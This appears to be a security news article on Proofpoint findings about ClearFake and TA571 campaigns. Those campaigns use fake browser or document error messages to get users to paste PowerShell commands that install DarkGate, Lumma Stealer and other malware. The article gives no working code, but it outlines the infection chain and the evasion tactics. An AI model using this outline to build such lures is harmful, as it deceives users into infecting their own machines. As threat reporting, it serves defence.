Attackers are using a social engineering technique to trick users into running malicious PowerShell scripts by presenting a fake error message with instructions to copy and paste a script into PowerShell, infecting the system with malware like DarkGate or information stealers.
The technique, observed since March 2024, leverages both malspam and compromised websites to deliver the malicious script via popups.
In the ClearFake campaign, attackers compromised legitimate websites to inject malicious scripts, which used EtherHiding to load a Keitaro TDS filtered script, and if the script passed checks, a fake warning overlay instructed users to copy and run a PowerShell script.
This script flushed the DNS cache, downloaded another script, and checked system temperatures. If successful, it downloaded an AES-encrypted PowerShell script that retrieved a data.zip archive.
The archive contained legitimate executables that side-loaded a trojanized DLL, which in turn used DOILoader to load Lumma Stealer, which downloaded additional malware, including Amadey Loader, a downloader for a crypto miner, a clipboard hijacker, and potentially JaskaGO malware.
Researchers at Proofpoint discovered compromised websites injecting an iframe on pley[.]es in April 2024, which displayed a fake error message tricking users into running a PowerShell script that would download Vidar Stealer, while the payload domain was taken down shortly after, rendering the initial attack ineffective.
Days later, the iframe content was replaced with a ClearFake injection, which is still active as of June 2024, and it’s unclear if these are two separate attacks or if the ClearFake actor took over the compromised iframe.
TA571 Campaign:
TA571, a spam distributor, launched email campaigns with HTML attachments disguised as Microsoft Word or OneDrive documents by displaying fake error messages, prompting users to click the “How to Fix” or “Auto-Fix” buttons.
Clicking these buttons would copy malicious PowerShell commands to the clipboard and instruct users to execute them through the PowerShell terminal or Run dialog, which downloads and installs malware like Matanbuchus, DarkGate, or NetSupport RAT.
In order to avoid detection, TA571 updates its lures on a regular basis and employs strategies such as padding attachments.
Malicious actors TA571 and ClearFake are using browser-based JavaScript to inject PowerShell/CMD scripts into HTML attachments or websites, which are encoded in various ways and copied to the clipboard.
The technique bypasses antivirus and EDR because the malicious code is executed directly from the clipboard without a file on disk and injects the script into the PowerShell terminal for one-click execution, while ClearFake uses the Run dialog, which may give users pause to review the code before execution.
Also Read: